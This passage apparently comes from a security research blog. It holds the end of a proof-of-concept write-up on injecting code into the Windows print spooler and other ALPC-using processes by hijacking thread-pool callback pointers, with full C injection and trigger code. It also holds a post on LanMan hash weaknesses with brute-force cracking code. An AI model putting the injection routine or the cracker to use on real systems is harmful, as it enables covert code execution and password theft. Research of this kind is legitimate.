00000000`011fbd48  00000000`00000000 ; CallbackPriority
00000000`011fbd50  00000000`00000000 ; Size

00000000`011fbd58  00007ffc`b38a9240 RPCRT4!LrpcIoComplete ; Callback
00000000`011fbd60  00000000`0121c948 ; CallbackParameter

The following structure is used to find valid CBEs instead of the original from the SDK.

// this structure is derived from TP_CALLBACK_ENVIRON_V3,
// but also includes two additional values. one to hold
// the callback function and the other is a callback parameter
typedef struct _TP_CALLBACK_ENVIRON_X {
    ULONG_PTR   Version;
    ULONG_PTR   Pool;
    ULONG_PTR   CleanupGroup;
    ULONG_PTR   CleanupGroupCancelCallback;
    ULONG_PTR   RaceDll;
    ULONG_PTR   ActivationContext;
    ULONG_PTR   FinalizationCallback;
    ULONG_PTR   Flags;
    ULONG_PTR   CallbackPriority;
    ULONG_PTR   Size;
    ULONG_PTR   Callback;
    ULONG_PTR   CallbackParameter;
} TP_CALLBACK_ENVIRON_X;

We read blocks of memory equivalent to the size of TP_CALLBACK_ENVIRON_X and validate them with some simple checks. The following function can determine if the memory looks like a valid CBE.

BOOL IsValidCBE(HANDLE hProcess, PTP_CALLBACK_ENVIRONX cbe) {
    MEMORY_BASIC_INFORMATION mbi;
    SIZE_T                   res;
    
    // invalid version?
    if(cbe->Version > 5) return FALSE;
    
    // these values shouldn't be empty  
    if(cbe->Pool                 == 0 ||
       cbe->FinalizationCallback == 0) return FALSE;
       
    // these values should be equal
    if ((LPVOID)cbe->FinalizationCallback != 
        (LPVOID)cbe->ActivationContext) return FALSE;
    
    // priority shouldn't exceed TP_CALLBACK_PRIORITY_INVALID
    if(cbe->CallbackPriority > TP_CALLBACK_PRIORITY_INVALID) return FALSE;
    
    // the pool functions should originate from read-only memory
    res = VirtualQueryEx(hProcess, (LPVOID)cbe->Pool, &mbi, sizeof(mbi));
      
    if (res != sizeof(mbi)) return FALSE;
    if (!(mbi.Protect & PAGE_READONLY)) return FALSE;
    
    // the callback function should originate from read+execute memory
    res = VirtualQueryEx(hProcess, 
      (LPCVOID)cbe->Callback, &mbi, sizeof(mbi));
      
    if (res != sizeof(mbi)) return FALSE;
    return (mbi.Protect & PAGE_EXECUTE_READ);
}

Payload

The payload is written in C and simply runs notepad. Calculator isn’t used because it’s a metro application on Windows 10 that has specific requirements to work. The TP_ALPC structure passed to LrpcIoComplete isn’t documented, but does include a structure similar to TP_CALLBACK_ENVIRON_V3. Once our payload is executed, we first restore the original Callback and CallbackParameter values. This is required because once we call WinExec, it will trigger another call to LrpcIoComplete, entering into an infinite loop before crashing the process. After restoration, call WinExec, followed by LrpcIoComplete using original values.

#ifdef TPOOL // Thread Pool Callback
// the wrong types are used here, but it doesn't really matter
typedef struct _TP_ALPC {
    // ALPC callback info
    ULONG_PTR   AlpcPool;
    ULONG_PTR   Unknown1;
    ULONG_PTR   Unknown2;
    ULONG_PTR   Unknown3;
    ULONG_PTR   Unknown4;
    ULONG_PTR   AlpcActivationContext;
    ULONG_PTR   AlpcFinalizationCallback;
    ULONG_PTR   AlpcCallback;
    ULONG_PTR   Unknown5;
    // callback environment
    ULONG_PTR   Version;
    ULONG_PTR   Pool;
    ULONG_PTR   CleanupGroup;
    ULONG_PTR   CleanupGroupCancelCallback;
    ULONG_PTR   RaceDll;
    ULONG_PTR   ActivationContext;
    ULONG_PTR   FinalizationCallback;
    ULONG_PTR   Flags;
    ULONG_PTR   CallbackPriority;
    ULONG_PTR   Size;
    ULONG_PTR   Callback;
    ULONG_PTR   CallbackParameter;
} TP_ALPC;

typedef struct _tp_param_t {
    ULONG_PTR   Callback;
    ULONG_PTR   CallbackParameter;
} tp_param;

typedef TP_ALPC TP_ALPC, *PTP_ALPC;

typedef void (WINAPI *LrpcIoComplete_t)(LPVOID, LPVOID, LPVOID, LPVOID);

VOID TpCallBack(LPVOID tp_callback_instance, 
  LPVOID param, PTP_ALPC alpc, LPVOID unknown2) 
#endif
{
    WinExec_t pWinExec;
    DWORD     szWinExec[2],
              szNotepad[3];
    #ifdef TPOOL
      LrpcIoComplete_t pLrpcIoComplete;
      tp_param         *tp=(tp_param*)param;
      ULONG_PTR        op;
      // param should contain pointer to tp_param
      pLrpcIoComplete = (LrpcIoComplete_t)tp->Callback;
      op              = tp->CallbackParameter;
      // restore original values
      // this will indicate we executed ok,
      // but is also required before the call to WinExec
      alpc->Callback          = tp->Callback;
      alpc->CallbackParameter = tp->CallbackParameter;
    #endif
    // now call WinExec to start notepad
    szWinExec[0] = *(DWORD*)"WinE";
    szWinExec[1] = *(DWORD*)"xec\0";
    
    szNotepad[0] = *(DWORD*)"note";
    szNotepad[1] = *(DWORD*)"pad\0";

    pWinExec = (WinExec_t)xGetProcAddress(szWinExec);
    
    if(pWinExec != NULL) {
      pWinExec((LPSTR)szNotepad, SW_SHOW);
    }
    
    // finally, pass the original message on..
    #ifdef TPOOL 
      pLrpcIoComplete(tp_callback_instance, 
        (LPVOID)alpc->CallbackParameter, alpc, unknown2);
    #endif
    
    #ifndef TPOOL
    return 0;
    #endif
}

Deploying and Triggering Payload

Here, we use a conventional method of sharing the payload/shellcode with spooler process. This consists of:

  • OpenProcess(“spoolsv.exe”)
  • VirtualAllocEx(payloadSize, PAGE_EXECUTE_READWRITE)
  • WriteProcessMemory(payload, payloadSize)

Once we have a valid CBE, we patch the Callback pointer with address to our payload and try invoke it using the print spooler API. Although OpenPrinter is used in the following code, you could probably use any other API that involves interaction with the print spooler service. At the abstraction layer, interaction with the print spooler service is conducted over Local Procedure Call (LPC) which is an interprocess communication. Over the network uses Remote Procedure Call (RPC) but we’re obviously not injecting over network. 😉

// try inject and run payload in remote process using CBE
BOOL inject(HANDLE hp, LPVOID ds, PTP_CALLBACK_ENVIRONX cbe) {
    LPVOID               cs = NULL;
    BOOL                 bStatus = FALSE;
    TP_CALLBACK_ENVIRONX cpy;    // local copy of cbe
    SIZE_T               wr;
    HANDLE               phPrinter = NULL;
    tp_param             tp;
    
    // allocate memory in remote for payload and callback parameter
    cs = VirtualAllocEx(hp, NULL, payloadSize + sizeof(tp_param), 
            MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            
    if (cs != NULL) {
        // write payload to remote process
        WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
        // backup CBE
        CopyMemory(&cpy, cbe, sizeof(TP_CALLBACK_ENVIRONX));
        // copy original callback address and parameter
        tp.Callback          = cpy.Callback;
        tp.CallbackParameter = cpy.CallbackParameter;
        // write callback+parameter to remote process
        WriteProcessMemory(hp, (LPBYTE)cs + payloadSize, &tp, sizeof(tp), &wr);
        // update original callback with address of payload and parameter
        cpy.Callback          = (ULONG_PTR)cs;
        cpy.CallbackParameter = (ULONG_PTR)(LPBYTE)cs + payloadSize;
        // update CBE in remote process
        WriteProcessMemory(hp, ds, &cpy, sizeof(cpy), &wr);
        // trigger execution of payload
        if(OpenPrinter(NULL, &phPrinter, NULL)) {
          ClosePrinter(phPrinter);
        }
        // read back the CBE
        ReadProcessMemory(hp, ds, &cpy, sizeof(cpy), &wr);
        // restore the original cbe
        WriteProcessMemory(hp, ds, cbe, sizeof(cpy), &wr);
        // if callback pointer is the original, we succeeded.
        bStatus = (cpy.Callback == cbe->Callback);
        // release memory for payload
        VirtualFreeEx(hp, cs, payloadSize, MEM_RELEASE);
    }
    return bStatus;
}

Figure 2 shows an attempt to inject code by four different DLL before finally succeeding with RPCRT4.dll.

Figure 2. Code injection via Callback Environment

The code shown here is only a proof of concept and could be refined to be more elegant or be applied to other processes that use thread pooling. I only use the print spooler here, but of course other processes use thread pooling and could also be leveraged for code injection. Sources can be found here.

Update

To use the same method of injection against almost any other process that uses ALPC, you can connect directly to the ALPC port.

/**
  Get a list of ALPC ports with names
*/
DWORD GetALPCPorts(process_info *pi) 
{    
    ULONG                      len=0, total=0;
    NTSTATUS                   status;
    LPVOID                     list=NULL;    
    DWORD                      i;
    HANDLE                     hObj;
    PSYSTEM_HANDLE_INFORMATION hl;
    POBJECT_NAME_INFORMATION   objName;
    
    pi->ports.clear();
    
    // get a list of handles for the local system
    for(len=MAX_BUFSIZ;;len+=MAX_BUFSIZ) {
      list = xmalloc(len);
      status = NtQuerySystemInformation(
          SystemHandleInformation, list, len, &total);
      // break from loop if ok    
      if(NT_SUCCESS(status)) break;
      // free list and continue
      xfree(list);   
    }
    
    hl      = (PSYSTEM_HANDLE_INFORMATION)list;
    objName = (POBJECT_NAME_INFORMATION)xmalloc(8192);
    
    // for each handle
    for(i=0; i<hl->NumberOfHandles; i++) {
      // skip if process ids don't match
      if(hl->Handles[i].UniqueProcessId != pi->pid) continue;

      // skip if the type isn't an ALPC port
      // note this value might be different on other systems.
      // this was tested on 64-bit Windows 10
      if(hl->Handles[i].ObjectTypeIndex != 45) continue;
      
      // duplicate the handle object
      status = NtDuplicateObject(
            pi->hp, (HANDLE)hl->Handles[i].HandleValue, 
            GetCurrentProcess(), &hObj, 0, 0, 0);
            
      // continue with next entry if we failed
      if(!NT_SUCCESS(status)) continue;
      
      // try query the name
      status = NtQueryObject(hObj, 
          ObjectNameInformation, objName, 8192, NULL);
      
      // got it okay?
      if(NT_SUCCESS(status) && objName->Name.Buffer!=NULL) {
        // save to list
        pi->ports.push_back(objName->Name.Buffer);
      }
      // close handle object
      NtClose(hObj); 
    }
    // free list of handles
    xfree(objName);
    xfree(list);
    return pi->ports.size();
}

Connecting to ALPC port

// connect to ALPC port
BOOL ALPC_Connect(std::wstring path) {
    SECURITY_QUALITY_OF_SERVICE ss;
    NTSTATUS                    status;
    UNICODE_STRING              server;
    ULONG                       MsgLen=0;
    HANDLE                      h;
    
    ZeroMemory(&ss, sizeof(ss));
    ss.Length              = sizeof(ss);
    ss.ImpersonationLevel  = SecurityImpersonation;
    ss.EffectiveOnly       = FALSE;
    ss.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;

    RtlInitUnicodeString(&server, path.c_str());
    
    status = NtConnectPort(&h, &server, &ss, NULL, 
      NULL, (PULONG)&MsgLen, NULL, NULL);
      
    NtClose(h);
    
    return NT_SUCCESS(status);
}

Deploying/Triggering

Same as before except we have to try multiple ALPC ports instead of just using print spooler API.

// try inject and run payload in remote process using CBE
BOOL ALPC_deploy(process_info *pi, LPVOID ds, PTP_CALLBACK_ENVIRONX cbe) {
    LPVOID               cs = NULL;
    BOOL                 bInject = FALSE;
    TP_CALLBACK_ENVIRONX cpy;    // local copy of cbe
    SIZE_T               wr;
    tp_param             tp;
    DWORD                i;
    
    // allocate memory in remote for payload and callback parameter
    cs = VirtualAllocEx(pi->hp, NULL, 
      pi->payloadSize + sizeof(tp_param), 
      MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            
    if (cs != NULL) {
        // write payload to remote process
        WriteProcessMemory(pi->hp, cs, pi->payload, pi->payloadSize, &wr);
        // backup CBE
        CopyMemory(&cpy, cbe, sizeof(TP_CALLBACK_ENVIRONX));
        // copy original callback address and parameter
        tp.Callback          = cpy.Callback;
        tp.CallbackParameter = cpy.CallbackParameter;
        // write callback+parameter to remote process
        WriteProcessMemory(pi->hp, (LPBYTE)cs + pi->payloadSize, &tp, sizeof(tp), &wr);
        // update original callback with address of payload and parameter
        cpy.Callback          = (ULONG_PTR)cs;
        cpy.CallbackParameter = (ULONG_PTR)(LPBYTE)cs + pi->payloadSize;
        // update CBE in remote process
        WriteProcessMemory(pi->hp, ds, &cpy, sizeof(cpy), &wr);
        // trigger execution of payload
        for(i=0;i<pi->ports.size(); i++) {
          ALPC_Connect(pi->ports[i]);
          // read back the CBE
          ReadProcessMemory(pi->hp, ds, &cpy, sizeof(cpy), &wr);
          // if callback pointer is the original, we succeeded.
          bInject = (cpy.Callback == cbe->Callback);
          if(bInject) break;
        }
        // restore the original cbe
        WriteProcessMemory(pi->hp, ds, cbe, sizeof(cpy), &wr);
        // release memory for payload
        VirtualFreeEx(pi->hp, cs, 
          pi->payloadSize+sizeof(tp), MEM_RELEASE);
    }
    return bInject;
}

Sources can be found here.

Posted in injection, malware, programming, windows | Tagged , , , | 2 Comments

How the L0pht (probably) optimized attack against the LanMan hash.

  1. Introduction
  2. Data Encryption Standard
  3. The LanMan Algorithm
  4. Brute Force Attack
  5. Version 1
  6. Precomputing Key Schedules 1
  7. Version 2
  8. Using Macros For The Key Schedule Algorithm
  9. Initial and Final Permutation
  10. Skipping Rounds
  11. Version 3
  12. Precomputing Key Schedules 2
  13. Version 4
  14. Results

1. Introduction

Some of you may remember a famous group of hackers that operated out of a loft (or attic) in Boston, Massachusetts, USA between 1992 and 2000 that called themselves L0pht Heavy Industries. Perhaps a defining moment in the group’s history was in May 1998 when they testified before the United States Congress, forewarning about the fragility of the Internet and how it could be shut down in 30 minutes using the Border Gateway Protocol (BGP). Most oldskool hackers will remember them for being some of the first security researchers to practice responsible disclosure of software vulnerabilities via advisories, aswell as maintaining a number of websites like HackerNews.com, the Black Crawling Systems Archives, the Whacked Mac Archives and Guerilla.net.

Like many people, I remember the group for writing L0phtCrack, a tool designed to recover passwords protected by the Windows operating system. L0phtCrack was originally published with an advisory almost 22 years ago in April 1997. In the year 2000, a now defunct company called @atstake acquired L0pht, including the ownership rights to L0phtCrack. In 2004, Symantec acquired @atstake before discontinuing development and distribution of L0phtCrack in 2005. In 2009, members of the original L0pht group (Zatko, Wysopal, and Rioux) reacquired ownership rights to L0phtCrack and continued with its development up to the present day. Those of you that want to know more about the group can read History of the L0pht.

This post suggests some ways the L0pht may have accelerated recovery of passwords protected by the LanMan (LM) hash that is derived from the Data Encryption Standard (DES). I don’t reveal any Top Secret technique for cracking DES that only L0pht or some alphabet agencies know about. Similar optimizations were implemented over twenty years ago by Alexander Peslyak and Roman Rusakov in another popular password recovery tool called John The Ripper.

l0pht

2. Data Encryption Standard

DES is a block cipher that operates on plaintext blocks of 64-bits and returns ciphertext blocks of the same size. Each key can be 56-bits in total giving us 2^{56} (72,057,594,037,927,936), or approximately 72 quadrillion possible keys. A 56-bit key is expanded into 16 subkeys or round keys, each of which is 48-bits long. It has for over 20 years been considered obsolete and insecure, but continues to be used mainly to support legacy systems.

What follows is a list of notable events around initial research into cracking DES, including the LanMan hash derived from DES.

January 1997 Cryptographer Eli Biham publishes his paper at Fast Software Encryption 4 titled A Fast New DES Implementation in Software. It describes a novel way to optimize the Data Encryption Standard using simple bitwise operations (XOR, AND, NOT, OR). Although unrelated to the development of L0phtCrack, the technique would later be used to optimize attacks against the LanMan hash in tools like John The Ripper.
January 1997 Rocke Verser launches DESCHALL in response to an offer by RSA to crack DES for a $10,000 prize.
March 1997 Samba developer Jeremy Allison releases pwdump. It enables Administrators to dump LM (derived from DES) and NTLM (derived from MD4) hashes stored in the Security Account Manager (SAM) database on Windows NT.
April 1997 L0phtCrack v1.0 released. It primarily exploits the poor design of the LanMan algorithm to recover plaintext passwords.
May 1997 Microsoft releases Service Pack 3 for Windows NT that includes “SYSKEY”; an optional component designed to prevent pwdump working properly.
June 1997 Rocke Verser announces the recovery a 56-bit DES key.
July 1997 L0phtCrack v1.5 released. Includes a much more detailed analysis of Server Message Block (SMB) authentications. Cryptographer David Wagner shares his observations on the the challenge response/pair and suggests ways to optimize attacks against it.
August 1997 L0pht attend the Beyond HOPE (The Hackers on Planet Earth) conference in New York city. Discuss the lack of adequate security provided by vendors in various technologies.
February 1998 L0phtCrack v2.0 released. Includes an SMB session network sniffer, a multithreaded brute force algorithm and faster search algorithm for large databases.
May 1998 Matthew Kwan releases his “bitslice” code based on the paper by Eli Biham.
July 1998 The Electronic Frontier Foundation build a DES cracker called “Deep Crack” and recover a 56-bit key in 56 hours using a device that costs $250,000.
January 1999 Deep Crack and distributed.net break a DES key in 22 hours and 15 minutes.
January 1999 L0phtCrack v2.5 released. The DES routines have been highly optimized in assembler for Pentium, Pentium MMX, Pentium Pro, and Pentium II specific processors. This results in a 450% speed increase. All alphanumeric passwords can be found in under 24 hours on a Pentium II/450.

What I try to focus on in this post is how the L0pht gained a “450% speed increase” over previous versions of the software, but first, how are LanMan hashes created?

3. The LanMan Algorithm

  1. The password is restricted to a maximum of fourteen characters. (null-padded if required)
  2. The password is converted to uppercase.
  3. The password is encoded in the system OEM code page.
  4. The password is split into 7-byte halves and used to create two DES keys.
  5. Each key is used to encrypt the string KGS!@#$% using DES in ECB mode, resulting in two 8-byte ciphertext values. The string “KGS!@#$% could possibly mean Key of Glen and Steve with the combination of Shift + 12345. Glen Zorn and Steve Cobb are the authors of RFC 2433 (Microsoft PPP CHAP Extensions).
  6. The two ciphertext values are concatenated to create a 16-byte value, which is the LM hash.

Using the above details, the following code uses OpenSSL to generate a LanMan hash. The only thing missing is the OEM encoding. For that reason, hashes generated by this code will not always match those generated by Windows itself. Internally, Windows originally used the CharToOem API before creating a DES key. This is important to remember because some passwords generated by Windows will simply not be recovered unless the cracker uses CharToOem or CharToOemBuff before hand.

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#include <openssl/des.h>

void DES_str_to_key (char str[], uint8_t key[]) {
    int i;

    key[0] = str[0] >> 1;
    key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2);
    key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3);
    key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4);
    key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5);
    key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6);
    key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7);
    key[7] = str[6] & 0x7F;

    for (i = 0;i < 8;i++) {
      key[i] = (key[i] << 1);
    }
    DES_set_odd_parity ((DES_cblock*)key);
}

char* lmhash(char *pwd) {
    DES_cblock       key1, key2;
    DES_key_schedule ks1, ks2;
    const char       ptext[]="KGS!@#$%";
    static char      hash[64], lm_pwd[16];
    uint8_t          ctext[16];
    size_t           i, pwd_len = strlen(pwd);
    
    // 1. zero-initialize local buffer
    memset(lm_pwd, 0, sizeof(lm_pwd));
    
    // 2. convert password to uppercase (restricted to 14 characters)
    for(i=0; i<pwd_len && i<14; i++) {
      lm_pwd[i] = toupper((int)pwd[i]);
    }
    
    // 3. create two DES keys
    DES_str_to_key(&lm_pwd[0], (uint8_t*)&key1);
    DES_str_to_key(&lm_pwd[7], (uint8_t*)&key2);
    DES_set_key(&key1, &ks1);
    DES_set_key(&key2, &ks2);
    
    // 4. encrypt plaintext
    DES_ecb_encrypt((const_DES_cblock*)ptext, 
      (DES_cblock*)&ctext[0], &ks1, DES_ENCRYPT);

    DES_ecb_encrypt((const_DES_cblock*)ptext, 
      (DES_cblock*)&ctext[8], &ks2, DES_ENCRYPT);
      
    // 5. convert ciphertext to string
    for(i=0; i<16; i++) {
      snprintf(&hash[i*2], 3, "%02X", ctext[i]);
    }
    return hash;
}


int main(int argc, char *argv[]) {
    if (argc!=2) {
      printf("usage: lmhash <password>\n");
      return 0;
    }
    
    printf("LM Hash: %s\n", lmhash(argv[1]));
    return 0;
}

We identify a number of weaknesses here based on the algorithm.

  1. Electronic Code Book (ECB) mode using plaintext that is always the same. Contrast this with unix crypt3() that encrypts a nonce/salt resulting in unique ciphertext. As a result of the LanMan algorithm encrypting the same plaintext, passwords seven characters or less will always include 0xAAD3B435B51404EE in the 16-byte LM hash.
  2. The fourteen character password is used to create two 7-byte or 56-bit DES keys. This means a brute force attack only requires 95^{7} attempts instead of 95^{14}
  3. Passwords are converted to uppercase, reducing the keyspace to 69^{7} attempts.

4. Brute Force Attack

Brute force has sometimes been referred to as “dumb mode” because rather than select passwords based on a predefined set of rules, it will simply attempt all possible combinations from a set of numbers and letters, including ones that are unlikely to be used in practice. Passwords should always be easy to recall, and even today it’s unusual for people to pick something that might be difficult to remember later. Having said that, rules are imperfect and sometimes only an exhaustive search of the keyspace will succeed.

The following screenshot is of L0phtcrack 2.5 running inside a virtual machine. As you can see, it averages around 5.64 million tries/keys per second.

The brute force cracker implemented in lmcrack is simply to demonstrate the overall gains achieved via simple optimizations and isn’t intended to be used for anything else. Those that want to recover passwords should use a fully functional password cracker.

5. Version 1

The first version is simply using the OpenSSL library. L0phtCrack v1.0 and v1.5 both used DES routines from the OpenSSL library.

static bool crack_lm1(void *param) {
    int              i;
    DES_cblock       deskey;
    DES_key_schedule ks;
    uint8_t          pwd[8]={0};
    const char       ptext[]="KGS!@#$%";
    uint8_t          ctext[8];
    crack_opt_t      *c=(crack_opt_t*)param;
    
    // initialize password
    for(i=0;i<7;i++) {
      if(c->pwd_idx[i] == ~0UL)break;
      pwd[i] = c->alphabet[c->pwd_idx[i]];
    }
      
    // while not stopped
    while(!c->stopped) {
      // convert password to DES odd parity key
      DES_str_to_key(pwd, deskey);
      // create DES subkeys 
      DES_set_key(&deskey, &ks);
      // encrypt plaintext
      DES_ecb_encrypt((const_DES_cblock*)ptext, 
        (DES_cblock*)ctext, &ks, DES_ENCRYPT);
      
      // increase how many passwords processed
      c->complete++;
      
      // if hashes match, set found and exit loop
      if(memcmp(ctext, c->hash.b, 8)==0) {
        c->found=true;
        return true;
      }
      // decrease total tried. if none left, exit
      if(--c->total_cbn == 0) {
        return false;
      }
      // update password index values
      for(i=0;;i++) {
        // increase one. if not length of alphabet, break.
        if(++c->pwd_idx[i] != c->alpha_len) {
          pwd[i] = c->alphabet[c->pwd_idx[i]];
          break;
        }  
        // reset index
        c->pwd_idx[i]=0;
        pwd[i] = c->alphabet[0];
      }
    }
    // we didn't find it
    return false;
}

The screenshot below shows 2.46 million keys per second are tested. It uses no optimization at all, apart from those used by the OpenSSL library.

6. Precomputing Key Schedules 1

The simple design of the DES key schedule algorithm makes both differential and linear attacks easier. That is not to imply the design was simplified to facilitate attacks. It was simplified to implement on 1970s hardware with wiring. The lack of non-linear operations means that no bits in a subkey overlap with another subkey. This allows us to use a bitwise OR / bitwise XOR to combine subkeys and generate completely new ones.

We can generate key schedules for each unique bit of a 56-bit key without requiring a large amount of storage. DES_init_keys() will perform this operation and only uses 229,376 bytes of RAM. That’s 256 key schedules (0x00-0xFF) for 7 bytes.

void DES_str_to_key (char str[], uint8_t key[]) {
    int i;

    key[0] = str[0] >> 1;
    key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2);
    key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3);
    key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4);
    key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5);
    key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6);
    key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7);
    key[7] = str[6] & 0x7F;

    for (i = 0;i < 8;i++) {
      key[i] = (key[i] << 1);
    }
    DES_set_odd_parity ((DES_cblock*)key);
}

// initialize 7*256 key schedules
void DES_init_keys(DES_key_schedule ks_tbl[7][256]) {
    DES_cblock key;
    int        i, j;
    char       pwd[8];
    
    memset(pwd,0,sizeof(pwd));
    
    // for each byte of a 56-bit key
    for(i=0;i<7;i++) {
      // create 256 key schedules
      for(j=0;j<256;j++) {
        pwd[i]=j;
        DES_str_to_key(pwd, (uint8_t*)&key);
        DES_set_key(&key, &ks_tbl[i][j]);
      }
      // clear byte
      pwd[i]=0;
    }
}

DES_set_keyx() works in the same way DES_set_key() does except it uses a precomputed table. As you will see later, this approach is much faster than using the function provided by OpenSSL. We are exploiting the lack of non-linear operations in the key scheduling algorithm and the fact no bits overlap with one another. A bitwise OR is used here, but an XOR will work too.

/ generate DES key schedule from precomputed DES schedules
void DES_set_keyx(DES_cblock*key, 
  DES_key_schedule *ks, DES_key_schedule ks_tbl[7][256]) 
{
    uint64_t *s, *d;
    uint8_t  *k=(uint8_t*)key;
    size_t   i, j;
    
    d = (uint64_t*)ks;
    
    // zero initialize
    for(i=0; i<128/8; i++) 
      d[i]=0;
    
    // for each byte of a 56-bit key
    for(i=0; i<7; i++) {
      // get a key schedule
      s = (uint64_t*)&ks_tbl[i][k[i]];
      
      // perform a bitwise OR
      for(j=0; j<128/8; j++) 
        d[j] |= s[j];
    }
}

7. Version 2

This is similar to version 1 with the obvious difference of using precomputed DES schedules.

static bool crack_lm2(void *param) {
    int              i;
    DES_key_schedule ks;
    uint8_t          pwd[7+1]={0};
    const char       ptext[]="KGS!@#$%";
    uint8_t          ctext[8];
    DES_key_schedule ks_tbl[7][256];
    crack_opt_t      *c=(crack_opt_t*)param;
    
    // precompute key schedules
    DES_init_keys(ks_tbl);
    
    // initialize password
    for(i=0;i<7;i++) {
      if(c->pwd_idx[i] == ~0UL)break;
      pwd[i] = c->alphabet[c->pwd_idx[i]];
    }
      
    // while not stopped
    while(!c->stopped) {
      // create DES subkeys from index values
      DES_set_keyx((DES_cblock*)pwd, &ks, ks_tbl);
      // encrypt plaintext
      DES_ecb_encrypt((const_DES_cblock*)ptext, 
        (DES_cblock*)ctext, &ks, DES_ENCRYPT);
      
      // increase how many passwords processed
      c->complete++;
      
      // if hashes match, set found and exit loop
      if(memcmp(ctext, c->hash.b, 8)==0) {
        c->found=true;
        return true;
      }
      // decrease total tried. if none left, exit
      if(--c->total_cbn == 0) return false;
      // update password index values
      for(i=0;;i++) {
        // increase one. if not length of alphabet, break.
        if(++c->pwd_idx[i] != c->alpha_len) {
          pwd[i] = c->alphabet[c->pwd_idx[i]];
          break;
        }  
        // reset index
        c->pwd_idx[i]=0;
        pwd[i] = c->alphabet[0];
      }
    }
    // we didn't find it
    return false;
}

4.44 million keys per second are tested which is a distinct improvement over version 1.

8. Using Macros For The Key Schedule Algorithm

In a brute force attack, we only require changing one byte in the password string for each iteration. However, DES_set_keyx will derive a key schedule from all 7 bytes. DES_init_keys2() is a new function that will generate DES key schedules using an alphabet and order them in a way that allows us to use macros for creating new key schedules.

// initialize key schedules for alphabet
void DES_init_keys2(char alphabet[], 
  DES_key_schedule ks_tbl[7][256]) 
{
    DES_cblock key;
    char       pwd[7+1];
    size_t     i, j, alpha_len=strlen(alphabet);
    
    memset(pwd,0,sizeof(pwd));
    
    // for each byte of a 56-bit key
    for(i=0;i<7;i++) {
      // create key schedules for each character of the alphabet
      for(j=0;j<alpha_len;j++) {
        pwd[i] = alphabet[j];
        DES_str_to_key(pwd, (uint8_t*)&key);
        DES_set_key(&key, &ks_tbl[i][j]);
      }
      // clear byte
      pwd[i]=0;
    }
}

The following macros replace DES_set_keyx and use vector instructions provded by SSE2 and AVX2 to improve performance.

// create DES subkeys using precomputed schedules
// using AVX2 is slightly faster than SSE2, but not by much.
#if defined(AVX2)
#include <immintrin.h>

#define DES_SET_KEY(idx) { \
    __m256i *s = (__m256i*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
    __m256i *p = (__m256i*)&ks[idx]; \
    __m256i *d = (__m256i*)&ks[idx-1]; \
    if (idx == 7) { \
        d[0] = s[0]; d[1] = s[1]; \
        d[2] = s[2]; d[3] = s[3]; \
    } else { \
        d[0] = _mm256_or_si256(s[0], p[0]); \
        d[1] = _mm256_or_si256(s[1], p[1]); \
        d[2] = _mm256_or_si256(s[2], p[2]); \
        d[3] = _mm256_or_si256(s[3], p[3]); \
    } \
}
#elif defined(SSE2)
#include <emmintrin.h>

#define DES_SET_KEY(idx) { \
    __m128i *s = (__m128i*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
    __m128i *p = (__m128i*)&ks[idx]; \
    __m128i *d = (__m128i*)&ks[idx-1]; \
    if (idx == 7) {\
        d[0] = s[0]; d[1] = s[1]; \
        d[2] = s[2]; d[3] = s[3]; \
        d[4] = s[4]; d[5] = s[5]; \
        d[6] = s[6]; d[7] = s[7]; \
    } else { \
        d[0] = _mm_or_si128(s[0], p[0]); \
        d[1] = _mm_or_si128(s[1], p[1]); \
        d[2] = _mm_or_si128(s[2], p[2]); \
        d[3] = _mm_or_si128(s[3], p[3]); \
        d[4] = _mm_or_si128(s[4], p[4]); \
        d[5] = _mm_or_si128(s[5], p[5]); \
        d[6] = _mm_or_si128(s[6], p[6]); \
        d[7] = _mm_or_si128(s[7], p[7]); \
    } \
}
#else
#define DES_SET_KEY(idx) { \
    uint64_t *p = (uint64_t*)&ks[idx]; \
    uint64_t *s = (uint64_t*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
    uint64_t *d = (uint64_t*)&ks[idx-1]; \
    \
    d[ 0]=s[ 0]; d[ 1]=s[ 1]; d[ 2]=s[ 2]; d[ 3]=s[ 3]; \
    d[ 4]=s[ 4]; d[ 5]=s[ 5]; d[ 6]=s[ 6]; d[ 7]=s[ 7]; \
    d[ 8]=s[ 8]; d[ 9]=s[ 9]; d[10]=s[10]; d[11]=s[11]; \
    d[12]=s[12]; d[13]=s[13]; d[14]=s[14]; d[15]=s[15]; \
    \
    if(idx < 7) { \
      d[ 0] |= p[ 0]; d[ 1] |= p[ 1]; \
      d[ 2] |= p[ 2]; d[ 3] |= p[ 3]; \
      d[ 4] |= p[ 4]; d[ 5] |= p[ 5]; \
      d[ 6] |= p[ 6]; d[ 7] |= p[ 7]; \
      d[ 8] |= p[ 8]; d[ 9] |= p[ 9]; \
      d[10] |= p[10]; d[11] |= p[11]; \
      d[12] |= p[12]; d[13] |= p[13]; \
      d[14] |= p[14]; d[15] |= p[15]; \
    } \
}
#endif

This really speeds up an attack, but we’re not entirely finished yet.

9. Initial and Final Permutation

So far, we’ve focused primarily on the key scheduling algorithm, but now let’s examine the encryption algorithm and try to reduce the amount of code required for this process.

Before encryption, the 64-bit plaintext is remapped using something known as Initial Permutation (IP). After 16 rounds of encryption have been applied, the inverse known as Final Permutation (FP) is applied. Believe it or not, both IP and FP were made part of the DES specification simply because of how expensive it was to build hardware back in the 1970s. The designers identified an issue with the wiring of hardware after the project was completed and had the choice between building a new hardware device or changing the specification.

